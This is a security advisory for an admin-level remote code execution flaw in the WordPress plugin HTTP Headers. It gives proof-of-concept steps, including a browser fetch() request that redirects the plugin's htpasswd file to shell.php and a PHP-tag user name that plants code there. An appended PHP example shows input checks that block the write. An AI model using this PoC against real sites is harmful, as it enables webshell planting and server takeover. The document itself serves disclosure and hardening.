wpexploit - WPEX-ID: E0CC6740-866A-4A81-A93D-FF486B79B7F7
Author: qerogram (at Kakao Style Corp.)
Published: Jun 19, 2023

HTTP Headers < 1.18.11 - Admin+ Remote Code Execution

Tags: http headers, admin, remote code execution, vulnerable site, settings, authentication, apache-based servers, exploit

EPSS: 0.002 (Low), percentile 57.4%

This plugin allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.

--- <= 1.18.10 PoC ---
1. As an admin, visit http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&tab=advanced, and paste the following in your browser's prompt:

await fetch("/wp-admin/options.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": `option_page=http-headers-mtd&action=update&_wpnonce=${jQuery('#_wpnonce').attr('value')}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dhttp-headers%26tab%3Dadvanced&hh_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess&hh_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini&hh_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php&hh_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh_method=htaccess`,
    "method": "POST",
    "mode": "cors"
});
2. Navigate to http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&header=www-authenticate
3. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
4. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
5. Go to /shell.php and see the RCE text.


--- Pre-1.18.8 PoC ---

1. As an admin user within WP Admin, navigate to Settings > HTTP Headers > Advanced settings.
2. Change the "Location of .hh-htpasswd" field: update the file name to "shell.php" (e.g. /var/www/html/shell.php)
3. Navigate to Settings > HTTP Headers > Authentication. Click "Edit" to the right of "WWW-Authenticate".
4. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
5. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
6. Go to /shell.php and see the RCE text.
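The write described above, seen from the plugin side, as an added hardening illustration that is not the plugin's own code or the vendor's fix: the configured location must resolve to the fixed .hh-htpasswd file under the site root, and a WWW-Authenticate user name must stay within htpasswd syntax so a record can never carry a PHP tag. Function names and the $site_root argument are assumptions; the inputs at the bottom are constructed to mirror the PoC values.

```php
<?php
// Added illustration (not the plugin's code): the two input checks that close
// this bug class. The plugin writes a WWW-Authenticate user record to the path
// from the "Location of .hh-htpasswd" setting; the write is only safe if (a) the
// destination is the fixed .hh-htpasswd file in the site root and (b) the record
// cannot contain anything but htpasswd syntax. Names here are assumptions.

function hh_safe_htpasswd_path(string $configured, string $site_root): ?string
{
    // Only the canonical file name is acceptable, so "shell.php" is rejected
    // before any filesystem access.
    if (basename($configured) !== '.hh-htpasswd') {
        return null;
    }
    // Resolve the directory so "../" segments and symlinks cannot escape the
    // site root; realpath() returns false for a directory that does not exist.
    $dir  = realpath(dirname($configured));
    $root = realpath($site_root);
    if ($dir === false || $root === false || $dir !== $root) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR . '.hh-htpasswd';
}

function hh_safe_htpasswd_user(string $user): ?string
{
    // htpasswd user names: no colon (field separator), no whitespace or
    // newline (record separator), and none of the '<' '>' '?' characters that
    // would let a record double as PHP if the file were ever served as code.
    return preg_match('/^[A-Za-z0-9._@-]{1,64}$/', $user) === 1 ? $user : null;
}

// Constructed inputs mirroring the PoC: a legitimate path, the shell.php path,
// the PHP-tag user name, and an ordinary user name.
$root = sys_get_temp_dir();
var_dump(hh_safe_htpasswd_path($root . '/.hh-htpasswd', $root));
var_dump(hh_safe_htpasswd_path($root . '/shell.php', $root));
var_dump(hh_safe_htpasswd_user('<?php echo "RCE" ?>'));
var_dump(hh_safe_htpasswd_user('admin'));
```

The same pattern applies to the other configurable locations in the Advanced settings (the .htaccess, .user.ini and .hh-htdigest paths): fix the basename, and resolve the directory against the site root before writing.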
